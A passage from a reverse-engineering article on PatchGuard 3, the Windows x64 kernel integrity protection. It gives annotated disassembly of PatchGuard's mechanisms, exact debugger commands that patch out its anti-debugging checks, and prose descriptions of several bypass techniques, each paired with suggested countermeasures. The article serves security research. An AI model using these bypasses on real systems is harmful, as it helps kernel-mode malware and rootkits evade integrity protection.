differentiate a PatchGuard exception from the many legitimate kernel +mode exceptions. In other words, PatchGuard attempts to hide in plain sight +amongst the normal background noise of kernel mode exceptions, the vast +majority of which exist inside filesystem-related code. + +2.3) Executing PatchGuard Without SEH + +One recurring theme that has continued to remain a staple for PatchGuard since +its inception is the use of structured exception handling to obfuscate the +calls to PatchGuard. The intention here is to use the many differences of SEH +between x64 and x86, and the lack of disassembler support for x64 SEH to make +it difficult to understand what is happening when calls to PatchGuard are +being made. Ironically, this use of x64 SEH as an obfuscation mechanism has +been a catalyst for much of the author's research [2] into Windows x64 SEH. +Today, it is the author's opinion that x64 exception handling is now publicly +documented to an extent that is comparable (or even exceeds) that available +for x86 SEH. + +Although x64 SEH may have been useful as an obfuscation technology initially, +it had clearly worked its way up to a major liability after PatchGuard 2 had +been released. This is due to the fact that SEH-related aspects of PatchGuard +had been successfully used to defeat PatchGuard on multiple occasions. With +the advent of PatchGuard 3, the authors of PatchGuard siezed the opportunity +to extricate themselves in some respect from the liability that x64 SEH had +become. + +PatchGuard 3 introduces a special mode of operation that allows it to function +without using SEH. This is a significant change (and improvement) with +respect to how PatchGuard has traditionally operated. It eliminates a major +class of single points of failure in that the exception dispatching path is +particularly vulnerable to external interference in terms of third party +drivers intercepting SEH dispatching before control is transferred to actual +exception handlers. The SEH-less mode of PatchGuard 3 operates by copying a +small section of code into non-paged pool memory (as part of a PatchGuard +context block). This code is then referenced by a timer object's +DeferredRoutine at the non-paged pool location in question. The code referred +to by the timer object is essentially a stripped down version of what happens +when any of the re-purposed DPC routines are invoked by PatchGuard: it sets up +a call to the first stage self-decrypting stub that ultimately calls the +system check routine. + +By completely eliminating SEH as a launch vector for PatchGuard, many bypass +techniques that hinged on being able to catch PatchGuard in the SEH +dispatching code path are completely invalidated. In an example of defense in +depth in terms of software protection systems, the old, SEH-based system is +still retained (with the previously mentioned modifications), such that a +would-be attacker now has multiple isolated launch vectors that he or she must +deal with in order to block PatchGuard from executing. Annotated disassembly +of the direct call routine that is copied to non-paged pool and invoked +without SEH is presented below: + +KiTimerDispatch proc near + pushf + sub rsp, 20h + mov eax, [rsp+28h+var_8] + xor r9d, r9d + xor r8d, r8d + mov [rsp+28h+arg_0], rax +; [rcx+40] -> PatchGuard Decryption Key + mov rax, [rcx+40h] + mov rcx, 0FFFFF80000000000h + xor rax, rdx +; Form a valid address for the PatchGuard context block by +; xoring the decryption key with the DeferredContext +; argument. + or rax, rcx +; Set the initial code for the stage 1 self-decrypting stub. + mov rcx, 8513148113148F0h + mov rdx, [rax] + mov dword ptr [rax], 113148F0h + xor rdx, rcx + mov rcx, rax +; Call the stage 1 self-decrypting stub. + call rax + add rsp, 20h + pop rcx + retn +KiTimerDispatch endp + +2.4) Randomized Call Frames in Repurposed DPC Routine Exception Paths + +One of the bypass vectors proposed for PatchGuard 2 was to intercept execution +at _C_specific_handler, detect PatchGuard, and resume execution at the return +point of the PatchGuard DPC (i.e. inside the timer or DPC dispatcher). This +is trivially possible due to the extensive unwind metadata present on Windows +x64 combined with the fact that a DPC that has been re-purposed by PatchGuard +does no useful work (other than invoking PatchGuard) and has no meaningful +effect on any out parameters or return value. + +In order to counteract this weakness, PatchGuard 3 introduces a random number +of function calls when a re-purposed DPC is called, but before any exception +is triggered. The intent with this randomization of the call frame stack is +to invalidate the approach of always unwinding one level deep in order to +effect a return from the DPC routine in question. Because there are a random +number of call frames between the point at which an exception is raised and +the start of the PatchGuard DPC routine, and the fact that the PatchGuard DPC +routines are not exported, it is more difficult to safely return out of a +PatchGuard DPC routine from the anywhere in the SEH dispatching code path. + +An example of the call frame randomization code is provided below (in this +case, ecx is initialized to small, random number that denotes the number of +calls to make). There are a number of routines in the form of +KiCustomRecurseRoutineN where N is [0..9], each identical. + +KiCustomRecurseRoutine4 proc near + sub rsp, 28h + dec ecx + jz short retpoint + call KiCustomRecurseRoutine5 +retpoint: + mov eax, [rdx] + add rsp, 28h + retn +KiCustomRecurseRoutine4 endp + +Although unwinds can still be performed, an attacker would need to be able to +locate the actual return address of the PatchGuard DPC routine which might +involve differentiating between the bogus KiCustomRecurseRoutine calls and the +actual call into the DPC routine itself. + +3) Additional Protection Mechanisms + +PatchGuard 3 and PatchGuard 2 both share some additional protection mechanisms +that have not been previously described. This chapter includes a description +of these protection mechanisms. + +3.1) Timer List Obfuscation + +PatchGuard 2 and PatchGuard 3 employ an obfuscation scheme that is used to +obfuscate timer and DPC object pointers in the timer list. This obfuscation +scheme hinges around two special kernel variables, KiWaitAlways and +KiWaitNever that represent two random obfuscation keys that are calculated at +boot time. These obfuscation keys are used to encode various pointers (such +as links to DPC objects in a KTIMER object residing in the kernel timer list) +that are intended to be protected from outside interference. For example, the +following algorithm is used to decode the KDPC link in a KTIMER object when a +timer DPC is going to be executed at expiration: + +ULONGLONG Deobfuscated; +PKDPC RealDpc; + +Deobfuscated = Timer->Dpc ^ KiWaitNever; +Deobfuscated = _rotl64(Deobfuscated, (UCHAR)KiWaitNever); +Deobfuscated = Deobfuscated ^ Timer; +Deobfuscated = _byteswap_uint64(Deobfuscated); +Deobfuscated = Deobfuscated ^ KiWaitAlways; + +RealDpc = (PKDPC)Deobfuscated; + +By virtue of being non-exported kernel variables, the original intention of +such a scheme was to make it difficult for third party drivers to easily +interfere with the timer list or certain other protected pointers. However, +the algorithm itself is fairly easy to understand once one locates code that +references it (such as most any timer-related code in the kernel), which +simply leaves detecting the values of KiWaitAlways and KiWaitNever at runtime +as the only remaining protection for the timer list to DPC object obfuscation. + +Ironically, the kernel debugger extension !kdexts.timer implements the +decoding algorithm (in kdexts!KiDecodePointer) so that a valid timer list can +be presented to the user if the timer display command is invoked. Because the +kernel debugger has access to PDB symbols for the kernel, it can trivially +locate KiWaitAlways and KiWaitNever. + +3.2) Anti-Debugging Code at PatchGuard Initialization Time + +As with PatchGuard 2, PatchGuard 3 includes a sizable amount of anti-debugging +code at runtime that is intended to frustrate attempts to step through the +PatchGuard initialization routines with a debugger. Most of this code is +based upon checking if a debugger is present while the PatchGuard +initialization routines are executing (which should not typically occur as the +PatchGuard initializtion routines are only called if a debugger is not +attached), and if a debugger is so detected, disable interrupts and entering a +spin loop so as to unrecoverably freeze the system. + +Although this anti-debugging code may appear intimidating at first, disabling +them is only a matter of locating all references to KdDebuggerNotPresent +within the PatchGuard initialization routine and patching out the checks into +the debugger. For example, the author used the following set of commands in +the debugger at initialization time to disable the anti-debugging checks for +Windows Vista x64 SP0, kernel version 6.0.6000.16514: + +bp nt!KeInitAmd64SpecificState + 12 "r @edx = 1 ; r @eax = 1 ; g" +bp nt!KiFilterFiberContext +eb nt!KiFilterFiberContext+0x20 eb +eb nt!KiFilterFiberContext+0x19a eb + +eb fffff800`01c63d22 eb +eb fffff800`01c64686 eb +eb fffff800`01c652be eb +eb fffff800`01c65334 eb +eb fffff800`01c65880 eb +eb fffff800`01c65a65 eb +eb fffff800`01c67479 eb +eb fffff800`01c68798 eb +eb fffff800`01c6a940 eb +eb fffff800`01c6b7a9 90 90 +eb fffff800`01c6b7dd eb +eb fffff800`01c6bad9 eb +eb fffff800`01c6d0e7 eb +eb fffff800`01c6d2f6 eb +eb fffff800`01c6d650 eb +eb fffff800`01c65c3a 90 90 90 90 90 90 +eb fffff800`01c690b1 90 90 90 90 90 90 + +3.3) KeBugCheckEx Protection + +One of the first bypass mechanisms proposed for PatchGuard 1 was to hook the +code responsible for bugchecking the system[4]. From there, an +attacker would simply resume normal system execution. + +There are several defensive mechanisms in place to prevent this. In the the +current version of PatchGuard, the entire contents of the thread stack are +filled with zeros, making it difficult to resume execution of whichever thread +was responsible for calling into PatchGuard. Furthermore, PatchGuard appears +to make a copy of KeBugCheckEx at system initialization time, and copy this +version over the actual code residing within the kernel at runtime just before +bringing down the system in a bug check. This is clearly visible by making a +modification to KeBugCheckEx in the debugger just as one enters the PatchGuard +check context, and then setting a breakpoint on the internal function in the +PatchGuard context to call KeBugCheckEx after clearing the stack and all +registers. If one then examines KeBugCheckEx, any modifications that have +been made will have vanished. + +Additionally, PatchGuard appears to disable DbgPrint (patching it out with a +"ret" opcode) before calling KeBugCheckEx. This may have been a (failed) +attempt to prevent easy access to execution within KeBugCheckEx without +actually patching KeBugCheckEx itself, which would circumvent the +aformentioned protection on modifications to the bugcheck code itself. +(KeBugCheckEx ordinarily utilizes DbgPrintEx to display a banner to the +debugger when a bug check occurs. However, because PatchGuard only patches +DbgPrint, there is no little to no effect in terms of what ends up happening +when the bug check finally does happen.) + +This code can be seen in the PatchGuard check routine, just before a call to +the KeBugCheckEx wrapper is made. The pointer to DbgPrint is established +during PatchGuard initialization at boot time. + +mov rax, [rbx+PATCHGUARD_CONTEXT.DbgPrint] +mov byte ptr [rax], 0C3h ; '+' ; ret + +3.4) Two-Stage Code Deobfuscation + +One of the more interesting defensive features of PatchGuard 2 and PatchGuard +3 is the mechanism by which it obfuscates the PatchGuard check context, or the +code and data necessary to verify system integrity. PatchGuard contexts are +obfuscated such that they are completely randomized in-memory while inactive, +and change their location and obfuscation keys (and thus contents) each time +the context is invoked to check system integrity. + +The decryption phase of PatchGuard is split into two stages. The first stage +is essentially a small stub that remains completely obfuscated in-memory until +just before it is called. The caller overwrites the first instruction in the +stub that is called with a "lock xor qword ptr [rcx], rdx" instruction. The +arguments to the stub are the address of the stub itself (in rcx), and the +decryption key (in rdx). Thus, the first instruction now modifies itself (and +more importantly the subsequent instruction, as each instruction is 4 bytes +long but modifies 8 bytes of opcode bytes), which results in being another xor +instruction. A small series of these xor instructions continues until the +second stage of the decoding stub is completely decoded. + +At this point, the second stage of the decoding stub is plaintext and may now +execute. The second stage consists of a loop of xor operations starting at +the end of the PatchGuard context and moving backward until the entire check +routine is decoded. Additionally, the decryption key is shifted each xor +round during the second stage decoding process. + +After the second stage decoding loop is complete, control is transferred to +the now-plaintext integrity check routine (all of the supporting data, such as +critical function pointers into the kernel, will also have been translated +into plaintext at this point by the second stage decoding loop). + +Source code to a basic program to decrypt a PatchGuard memoy context is +included with the article. The program expects to be supplied with a file +containing "dq" logs from the kernel debugger that cover the entire memory +context, along with the decryption key (at KDPC + 0x40) and +KDPC->DeferredContext values. + +4.5) Code Patching Support + +Given PatchGuard's penchant for blocking attempts to patch the kernel, one +would think that all kernel code is essentially expected to be fixed in stone +at boot time. However, this is not really the case. There are a number of +approved kernel patches that PatchGuard supports. For example, several +functions (such as SwapContext) can be patched in approved ways if hypervisor +support is enabled. In the case of SwapContext, for instance, a runtime patch +is made to redirect execution to EnlightenedSwapContext through a jump +instruction being written to the start of the routine. PatchGuard appears to +detect and permits patches to these functions through special exemptions (one +can observe the address of functions such as SwapContext being stored in the +PatchGuard context at initialization time, presumed to be for such a purpose). + +The code responsible for checking the integrity of the SwapContext patch is +provided below. Because the check ensures that a branch can only occur to +EnlightenedSwapContext, it would be difficult to utilize this code to perform +an arbitrary patch at SwapContext. + +cmp rdi, [rbx+PATCHGUARD_CONTEXT.SwapContext] +jnz short NotSwapContextExemption +cmp byte ptr [rdi], 0EBh ; 'd' ; backward jmps (short) +jnz short NotSwapContextExemption +cmp byte ptr [rdi+1], 0F9h ; '·' +jnz short NotSwapContextExemption +cmp byte ptr [rdi-5], 0E9h ; 'T' ; jmp (long) +jnz short NotSwapContextExemption +mov rcx, [rbx+PATCHGUARD_CONTEXT.EnlightenedSwapContext] +movsxd rax, dword ptr [rdi-4] +sub rcx, rdi +cmp rax, rcx +jz short BadSwapContextHook + +There also exists a second set of patches that PatchGuard must allow for +compatibility with older processors. Very early releases of x64 processors by +Intel did not implement the prefetch instruction, and so the kernel has +support for detecting an illegal opcode fault on a prefetch instruction, and +reacting by patching out the prefetch opcode on-the-fly. However, this sort +of on-the-fly patching is not normally permitted by PatchGuard (for obvious +reasons), at least not without special support. During initialization, +PatchGuard generates some code that executes a prefetch operation, and then +checks whether the the count of patched prefix instructions was incremented +after executing the patch code. Assuming that the processor is an older model +without prefetch support, then a special exemption (the "prefetch whitelist") +is activated the exempts a list of RVAs from the image base from PatchGuard's +checks. This list of RVAs is stored in a binary resource appended to +ntoskrnl.exe (named "PREFETCHWLIST"). + +The code for detecting if the prefetch exemption should be enabled at boot +time is as follows (the result of the check is, for Windows Server 2008 Beta +3, stored at offset 2B1 into the PatchGuard context): + +call KeGetPrcb +mov ecx, 2 +cmp [rax+63Dh], cl ; Prcb->CpuVendor +mov [rsp+0EC8h+var_D48], rax +jnz short SkipEnablePrefetchPatchExemption +lea rdx, [rsi+214h] ; PrefetchRoutineCode +mov dword ptr [rdx], 0C3090D0Fh ; prefetch [rcx] ; ret +mov ebx, cs:KiOpPrefetchPatchCount +lea rcx, [rsp+0EC8h+arg_18] +call rdx +mov ecx, cs:KiOpPrefetchPatchCount +cmp ebx, ecx +jz short SkipEnablePrefetchPatchExemption + +mov [rsi+2B1h], dil ; EnablePrefetchPatchExemption + +SkipEnablePrefetchPatchExemption: +; +; Initialization continues ... +; +mov eax, 100000h + +4) Bypass Mechanisms and Countermeasures + +Like PatchGuard 2, it would be folly to state that PatchGuard 3 is +invulnerable to assault by third party driver code intent on performing +operations blocked by PatchGuard. There are many possible attacks for the new +defenses in PatchGuard 3 (as well as several possible countermeasures that +Microsoft could take in order to break the proposed bypass mechanisms in a +future PatchGuard iteration). This article will describe specific attacks +that is capable of defeating PatchGuard 3. + +4.1) Hybrid Exception Interception and Memory Searching + +As PatchGuard 3 utilizes completely randomized (self-decrypting) blocks of +code and data for its constituent PatchGuard contexts in the SEH execution +case, it is not generally possible to trivially locate and disable PatchGuard +contexts through a non-paged pool scan. Additionally, due to PatchGuard 3's +break on relying upon SEH to invoke PatchGuard in all cases, it is also not +generally possible to disable PatchGuard 3 reliably via interception of the +SEH dispatching code path. + +While these defenses do complement one another, there still exists weaknesses +that can be exploited by a third party. Specifically, when PatchGuard is +running through a re-purposed DPC routine that is invoked via SEH, it is +vulnerable in that the SEH dispatching code path can be intercepted to locate +(and disable) PatchGuard just before it is executed. Furthermore, in the case +where PatchGuard runs without any SEH obfuscation, it is vulnerable to a +memory search, as there is (necessarily) some static code placed in non-paged +pool memory which makes the translation between the DPC function calling +convention and the PatchGuard stage 1 decryption routine's calling convention. + +By combining a memory search approach with the previously described SEH +interception approach, it is possible to attack both launch vectors of +PatchGuard simultaneously, with the effect of disabling it no matter which +vector(s) are used in a particular boot. + +However, there are still some sticking points that need to be resolved in the +SEH interception case. As previously mentioned, the SEH-obfuscation-based +launch vector was significantly improved over PatchGuard 2, with obfuscation +of the exception information and randomization of the call stack from the +point of view of the exception dispatcher logic itself. These obstacles must +be overcome in order to successfully mount an attack using this approach +against PatchGuard 3. + +The first problem relating to the obfuscation and randomization of the +exception information turns out to not be the roadblock that one might think +at first glance. There are some weaknesses of the obfuscation logic that +allow the true colors of the exception to show through if one is clever about +examining the information available at the point of _C_specific_handler. +Furthermore, it is also possible to hook at a lower level than +_C_specific_handler, such as KiGeneralProtectionFault (easily located by +examining the IDT), which would get one in before the assembly-language +exception handler logic has a chance to fudge the exception information. + +Although the KiGeneralProtectionFault vector is easier to implement in that it +completely bypasses one of the new defensive mechanisms with respect to the +SEH-related PatchGuard execution code path, it is again still possible to +attack PatchGuard using _C_specific_handler by relying upon information +leakage when _C_specific_handler is called. Specifically, all exceptions +altered by PatchGuard originate within the confines of the kernel itself, all +of the exceptions have two parameters (most of the "legitimate" versions of +exceptions like STATUS_INSUFFICIENT_RESOURCES always have zero parameters, +because they originate from within RtlRaiseStatus which never stores any +exception parameters in the exception record), and somewhere in the call stack +the kernel routine responsible for dispatching DPCs or timer DPCs is going to +be present. + +By combining these facts, it is possible to make a highly accurate +determination as to whether an exception is caused by PatchGuard. The latter +piece of information (checking whether the routine responsible for calling the +DPC or timer DPC is in the call stack) also proves valuable when one must +later counteract the second defense added to the SEH code path, that is, the +randomization of the call stack. + +In order to determine whether the DPC or timer DPC dispatcher is in a given +call stack, it is first necessary to locate it in the kernel image. There are +some complications here. First of all, the timer DPC dispatcher routine has +three call instructions that can call a timer DPC, not all of which are +readily triggerable. Additionally, neither the timer DPC dispatcher or the +DPC dispatcher are exported. + +However, while it is not possible to simply ask for the addresses of those two +routines, it is possible to find them programmatically by requesting that a +DPC and a timer DPC be executed through the documented APIs for DPCs and timer +DPCs. From within the DPC or timer DPC routine, it is then possible to locate +the return address via the use of the ReturnAddress() compiler intrinsic. +This works because the return address will be guaranteed to reside within the +DPC or timer DPC dispatcher. Alternatively, an assembly language routine +could be written that simply examines the current pointer at [rsp] at the time +of the call. + +This still leaves a problem in the timer DPC dispatcher case, as there are +three call instructions, and it is not easy to observe calls from all three +call sites within the timer DPC dispatcher on-demand, since it is necessary to +programmatically find the return points at runtime. However, once again, the +very same metadata that is critical to x64 SEH support dooms PatchGuard with +respect to this approach, as it is possible to go from an arbitrary +instruction in the middle of any function to the start of that function, by +following chained unwind metadata until an unwind metadata block is reached +that has no parent [4]. This top-level unwind metadata block has a reference +to the first instruction in the function. Now that it is possible to locate +the start of a function from any arbitrary valid instruction location within +that function, it becomes trivial to determine if two addresses reside in the +same function; to do this, one must only follow the unwind metadata chain for +both addresses, and then check to see whether both top-level unwind metadata +blocks refer to the same function. With this technique, combined with the +ability to locate at least one call site within the timer DPC dispatcher, it +again becomes possible to identify the timer DPC dispatcher, as no matter +which call site is used, it will be guaranteed that the call site resides +within the timer DPC dispatcher routine KiTimerExpiration. By comparing +top-level unwind metadata blocks, it becomes possible to authoritatively +discern whether any arbitrary instruction resides within the timer DPC +dispatcher or not. + +It is also possible to bypass the alterations to the exception (and +instruction pointer) addresses that KiCustomAccessHandler (the +assembly-language "first chance" exception handler routines for the repurposed +DPC routines) makes by performing a stack trace from the _C_specific_handler +itself instead of relying on the context record or exception handler +information. This is because the call stack is conveyed as if the faulting +instruction in the repurposed DPC call stack was the site of a call to +KiGeneralProtectionFault. As a result, it is possible to substitute the +current context for the context presented to _C_specific_handler for unwind +purposes. This also provides a layer of defense against Microsoft altering +other registers in the exception handler context in future PatchGuard +revisions, which could cause manual unwinds to return incorrect register +values, resulting in system crashes after an unwind intended to effect a hard +return out of the re-purposed DPC routine. + +Furthermore, by clever usage of this mechanism for determining whether an +address resides within a particular function, it is also now possible to +determine the real return address for any given re-purposed DPC routine. +Specifically, by checking whether each address in the call stack as of +_C_specific_handler is within either the DPC dispatcher or the +timer DPC dispatcher, one can determine whether a given call frame corresponds +to the call site that called the re-purposed DPC routine or not, irrespective +of any random amount of bogus function calls that may be layered on top of the +re-purposed DPC. This in turn defeats the remaining improvement to the SEH +PatchGuard code path, as it once again becomes possible to cleanly unwind from +any arbitrary point in the PatchGuard exception callstack. + +Through the combination of the ability to either circumvent entirely or "see +through" the deception that KiCustomAccessHandler creates over the exception +information passed to _C_specific_handler, and the ability to +recover the correct return address of a repurposed DPC routine, it now becomes +possible to disable the SEH control flow path of PatchGuard 3. This leaves +the remaining problem of locating the non-SEH control flow path of PatchGuard +in non-paged pool memory as the last piece of the puzzle with respect to this +method of disabling PatchGuard. However, locating the trampoline routine that +adapts a DPC routine call to a PatchGuard stage 1 decryption stub call is +trivial, as the adapter trampoline is static and contains a very recognizable +signature in terms of the constants written to the beginning of the decryption +stub. In order to disable the trampoline routine, it is enough to simply +patch it with a "ret" instruction (effectively the same thing as the SEH +bypass technique, but as implemented in code instead of a virtual unwind). + +The source code to a working implementation of the hybrid exception +interception and memory searching bypass technique for PatchGuard 3 is +included with the article. + +Although this approach is successful in disabling the current iteration of +PatchGuard 3, it is not without its weaknesses. Microsoft could, for +instance, disable this technique via altering the SEH-less PatchGuard +DPC-to-decryption-stub adapter to not be static (i.e. randomization of the +code placed into non-paged pool at runtime). There are also a number of +assumptions of the SEH-based approach that could be invalidated by Microsoft +in a future PatchGuard release. However, in keeping with the fact that it is +possible to gain control flow at a lower level than the exception dispatcher +path itself (i.e. patching KiGeneralProtectionFault), the author feels that it +would be better to focus on removing relevant information before any exception +handlers (assembler or C-language) are called instead of after the defining +moment (in other words, the exception) occurs, as it is the exception that +presents the first easily-accessible interception point to an outside +attacker. + +4.2) Timer DPC Dispatcher and DPC Dispatching + +Although PatchGuard 3 eliminates SEH as a single point of failure with respect +to executing the system integrity checks, the timer and DPC dispatchers +continue to remain attractive targets. One simple bypass mechanism is to +locate the call sites in both routines (such as by recording the addresses of +both dispatcher routines as described in bypass technique 1, and then +performing disassembly to locate and patch all call sites. At each call site, +it is possible to detect that PatchGuard is being executed by looking for +either a non-canonical DeferredContext parameter value or a DeferredRoutine +that resides within the non-paged pool. (In PatchGuard 3, implementing the +former check alone proves sufficient, as for the ease of the implementation of +PatchGuard 3, both the repurposed DPC routines and the non-SEH-based control +path use compatible calling conventions, which stipulate a non-canonical +obfuscated pointer value as the DeferredContext parameter.) + +The main disadvantage of this approach involves inherent difficulties in +performing arbitrary code patching in x64 (specifically, the large size of any +code patch and the large number of now relatively common +instruction-pointer-relative instructions). However, given that this is a +difficulty that impacts any code patching on x64, the author feels that it +should not be considered a significant problem for a determined attacker. In +fact, Microsoft Research's very own Detours implements a code patching system +for x64[5], illustrating that code patching on x64 in general +is not a task that should be considered insurmountable by any means. + +Because the timer and DPC dispatchers remain relatively unprotected targets +that have not been involved in public bypass source code that has been +released to date, the author would recommend bolstering the defenses of the +timer and DPC dispatcher for the next PatchGuard release, as the two routines +continue to represent an attractive single point of failure. Adding a third +PatchGuard execution mechanism that does not involve traditional DPCs at all +would be an example of one approach to eliminate the DPC dispatcher related +logic as a single point of failure. It may also be possible to increase the +difficulty of locating all the call sites within the DPC dispatching related +code through a combination of differing static call stack differences for each +of the three call sites of the timer DPC dispatcher (i.e. adding dummy +function calls) combined with call stack randomization on top of static call +stack differences between each of the three timer DPC dispatcher calll sites. +Randomized call stacks alone would not suffice as by examining the call stacks +of many iterations of timer DPC requests, it would become easy to eliminate +the randomized entries (which would not be common to all recorded call stacks) +with a relatively high degree of accuracy given a large sample size. A +disadvantage to taking such an approach is that it would essentially result in +adding deliberately-difficult-to-maintain "spaghetti code" into yet another +critical area of the operating system (timer DPC dispatcher logic). The +author suspects that the maintainer of the timer DPC dispatcher code would +likely not appreciate having to deal with such things. + +4.3) Canceling the PatchGuard Timer(s) + +As PatchGuard continues to rely upon timer DPCs for the execution of its check +routines, the kernel timer DPC list itself continues to remain a relatively +attractive target for attack. The timer DPC list is common to all control +paths leading to PatchGuard, as timers are always used for the delayed +execution component that periodically calls the check routine. + +There are presently two obstacles in the way of the timer DPC list. The first +of which is that altering it relies upon locating non-exported kernel +variables. Although it may be possible to do so via fingerprinting, this does +make the approach slightly less desirable than it might initially appear. +However, fingerprinting can work if done carefully, and there are many short +functions that reference the timer list in a fairly predictable fashion (e.g. +KeCancelTimer). One other possible way to find the DPC list would be to +create and set a timer (thus inserting it into the timer list), and then scan +every 8-byte-aligned value in a non-paged uninitialized data section in +ntoskrnl, treating each valid address as a linked list and searching the first +several entries for the timer that was just linked into the list. While a +rather ugly and bruteforce-based approach (and not entirely safe either as one +would need to be relying heavily on MmIsAddressValid), scanning the ntoskrnl +data sections is one alternative to fingerprinting in terms of finding the +timer list. + +The secondary problem with this approach is that starting with PatchGuard 2, +the timer list itself is obfuscated such that the link between a KTIMER object +and its corresponding KDPC is obfuscated. This obfuscation mechanism, as +previously described{backref to 1}, hinges upon two additional non-exported +kernel variables (KiWaitAlways, KiWaitNever) that act as obfuscation keys. +Locating these variables would be likely entail code analysis or +fingerprinting of (possibly exported) routines that need to insert a timer +into the timer list, such as KeSetTimerEx. + +Another alternative approach that dispenses with fingerprinting and/or +bruteforce-based approaches altogether, at the expense of requriring added +complexity (a user mode component), would be to postpone the activation of any +driver code that would run afoul of PatchGuard until after Win32 in user mode +has been started. A user mode service could then be created that would +download the symbols for the kernel binary in use, retrieve the addresses of +KiTimerTableListHead (the timer list), KiWaitNever and KiWaitAlways, and pass +these addresses on to the driver via any standard user mode to kernel mode +communication mechanism (such as DeviceIoControl). Because the kernel +debugger relies on the ability to retrieve these variables by name via the PDB +symbols for the !kdexts.timer extension, Microsoft would not be able to block +this approach by removing or renaming the obfuscation key variables without +imparing the functionality of existing debugger binaries. + +Once one has located the KiTimerTableListHead, KiWaitAlways, and KiWaitNever, +it is a fairly simple (if perhaps unsafe without synchronization, though one +could always take the "sledgehammer" approach and stop all but one CPU and +raise IRQL to HIGH_LEVEL) to traverse the timer list, deobfuscate +the DPC link on each corresponding timer object, and from there check each +timer to see whether it bears the characteristics of being a PatchGuard timer +(which may include attributes like a timer interval several minutes into the +future, a non-canonical DeferredContext value, and possibly a DPC routine +pointer into non-paged pool). After one has located the timer in question, it +can be easily disabled (either removing it from the list entirely, such as via +KeCancelTimer, or by rewriting the DPC routine to point to an empty function +that simply returns without performing any operation. + +Because Microsoft has functionality in the debugger that depends on the +ability to use these variables to access the timer list, they have +unfortunately backed themselves into something of a corner with respect to +current operating system versions, as it is generally Microsoft's policy that +existing debugger binaries continue to function properly after hotfixes or +service pack to a particular already-released operating system version. The +best ways to counteract this approach would be to make it more difficult to +pick out the PatchGuard DPC in-memory with respect to all of the other timer +DPC objects that are in the list at any given time for a typical system, and +to create additional launch vectors for PatchGuard that do not depend so +heavily on the timer list. There exist a number of other ways to execute code +without drawing the attention of someone that does not know what they are +looking, many of which are less obvious than a timer. + +4.4) Page-Table Swap + +Like all memory accesses in the Windows kernel, PatchGuard's system integrity +check routine operates in protected mode with paging enabled. It may +theoretically be possible to take advantage of this fact to hide kernel +patches from PatchGuard. + +The proposed bypass technique would involve patching the first instruction in +the timer and DPC dispatchers to branch to third party code. When a DPCs and +timer DPCs are about to be considered for execution, as signaled by a call to +one of the two dispatcher routines, a shadow copy of the page tables is +created. This shadow copy is configured to be identical to the normal page +table for the current process, except that the page table entries for any +kernel code pages that have been patched are altered to refer to physical +pages that are representative of the original state. The return address of +the DPC or timer DPC dispatcher on the stack is swapped with a pointer into +driver-supplied code, and cr3 is reconfigured to point to the shadow page +table. Then, execution is transferred back to the timer or DPC dispatcher +entrypoint (which no longer shows any signs of patching due to the page table +swap), and DPCs are dispatched. When the dispatcher is finished with its +work, which would include invoking PatchGuard if PatchGuard is to be executed +in any batched timer DPCs, then control is returned to driver-supplied code, +which then mirrors any page table modifications since the shadow copy was made +back to the actual page table for the process, and cr3 is returned to its +original value. Control is then transferred to the normal return point of the +dispatcher. + +This approach does not involve disabling PatchGuard at all. Instead, it +describes a potential way to "peacefully coexist" with it, so long as only +kernel code patches are being done. (Data pages, which could be expected to +be modified by a DPC, are considered by the author to be much less practical +to protect from PatchGuard in this fashion.) Because the DPC and timer DPC +dispatcher logic executes at IRQL DISPATCH_LEVEL, thread context +switching is disabled for the current thread, making the cr3 swap approach +relatively feasible. + +Because this approach does not involve attacking PatchGuard directly, it +automatically circumvents all of the myriad defensive mechanisms built into +PatchGuard in current releases, making it a fairly attractive potential avenue +of attack. However, there are some downsides. Among other things, the +synchronization required to pull a page tabpe swap off in a multiprocessor +environment are likely to be complex and difficult to safely duplicate if one +allows DPC routines to perform operations that alter PTEs. Additionally, +there would be a performance impact incurred by this approach as it would need +to run continuously in a relatively high-impact path (DPC dispatching) +throughout system lifetime. The performance implications of invalidating TLBs +on every DPC batch may be problematic in some circumstances (swapping cr3 +automatically clears out TLBs). + +Another disadvantage of this approach is that by virtue of the fact that all +DPCs (and potentially all device hardware interrupts) may run with the shadow +copy of the page table, most hardware-related events will not be subject to +kernel code patches hidden by this mechanism. This may or may not be a +problem depending on what the goal of the desired kernel patching is. + +Microsoft could counteract this approach by making a copy of all PTEs that +describe the kernel at PatchGuard initialization time, and then validate all +kernel code PTEs from within the PatchGuard check routine. Additionally, if +Microsoft could make the assumption that PatchGuard always executes in the +system process, another approach could be to require that cr3 take on a known +value. + +4.5) DPC Exception Handler Patching + +One of the changes introduced in PatchGuard 3 over PatchGuard 2 was a slight +change to the protocol used to invoke the first stage of the decryption +process. Specifically, all callers of an encrypted PatchGuard context now +include a static 8-byte string (of instruction opcodes) that is xor'd with a +value at the start of the PatchGuard context to form the initial decryption +key. + +The reasons for making this change over the original behavior are unclear to +the author, but it unfortunately represents an easy target for disabling +PatchGuard, as the string itself (0x8513148113148F0) is fairly unique and +unlikely to appear outside of PatchGuard in terms of kernel code. +Furthermore, all PatchGuard callers, including all ten of the repurposed DPC +routine exception handlers and the non-paged pool memory DPC adapter (if used) +reference the string with no obfuscation to speak of. This presents an +extremely easy, fingerprint-based approach to disabling PatchGuard. By +scanning non-paged pool space for this string, as well as kernel code regions, +it is trivially easy to locate an instruction in the middle of the every +single code path responsible for invoking PatchGuard's check context. + +After the instructions referencing the 8-byte string have been located, it is +trivial to patch them to execute an unwind out of the exception handler logic +(or in the case of the non-paged pool memory code, simply return directly). +Such an attack prevents PatchGuard from ever starting, and furthermore has the +advantage of a minimum of additional supporting logic required (when compared +to many of the other bypass techniques outlined in this article). + +It would be trivial for Microsoft to disable this technique. The +recommendation of the author would be to get rid of the static 8-byte string +referenced in every PatchGuard caller. Ironically, PatchGuard 2 necessarily +has a similar 4-byte string (which is also still used in PatchGuard 3), +representing the initial instruction of the first stage decryption stub. +Unlike with PatchGuard 3, however, PatchGuard 2 takes care to obfuscate the +process of writing the opcode string out to the PatchGuard context, so that +one cannot simply use a single blanket fingerprint to cover all cases. The +change made in PatchGuard 3 completely blows this work out of the water, so to +speak, and it has the added advantage of being twice as large as a value to +fingerprint as well. + +4.6) System Call MSR Swap + +A variation on the technique described in {backref:4}, it should theoretically +be possible to swap the system call MSRs (or in fact several other processor +control registers that are protected by PatchGuard) for the duration of DPC or +timer DPC dispatching online, with the "tainted" values being restored after +the dispatcher returns. The system call MSRs are responsible for designating +the address of the system call dispatcher, and are thus an attractive target +for third parties that would like to perform system call hooking. + +The same basic concepts would be applied to this technique as 